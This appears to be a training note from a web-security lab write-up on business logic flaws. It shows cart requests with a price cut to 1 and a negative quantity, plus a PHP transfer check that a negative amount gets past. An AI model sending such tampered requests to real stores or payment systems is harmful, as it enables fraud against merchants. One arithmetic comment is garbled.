Logic flows
Price Change
Wrong assumption that users will interact with the application only via interface.
# Request from user interface
POST /cart HTTP/1.1
Host: ac5f1ff61e6cd9abc06a2436002000d5.web-security-academy.net
productId=1&redir=PRODUCT&quantity=1&price=133700
# Request from Burp Repeater
POST /cart HTTP/1.1
Host: ac5f1ff61e6cd9abc06a2436002000d5.web-security-academy.net
productId=1&redir=PRODUCT&quantity=1&price=1 # Look Here
Bank Transfer
An attacker may pass in a negative value and induce unwanted behavior.
/**
* Funds transfer between two bank accounts:
*
* If the attacker sent -$1000 to the victim's account,
* this might result in them receiving $1000 from the victim instead.
*/
$transferAmount = $_POST['amount'];
$currentBalance = $user->getBalance();
if ($transferAmount <= $currentBalance) {
} else {}
Negative Quantity
Exploit on an website that doesn't check negative quantities.
# Request from user interface
POST /cart HTTP/1.1
Host: ac431f0f1f6ffc34c0a2344d00f200ea.web-security-academy.net
productId=1&redir=PRODUCT&quantity=1 # price: 1337
# Request from Burp Repeater
POST /cart HTTP/1.1
Host: ac431f0f1f6ffc34c0a2344d00f200ea.web-security-academy.net
productId=2&redir=PRODUCT&quantity=-100 # price: -13
# 1337 - 1300 = 37 > 100 (store credit)
➥ Questions
Last update: 128 days ago
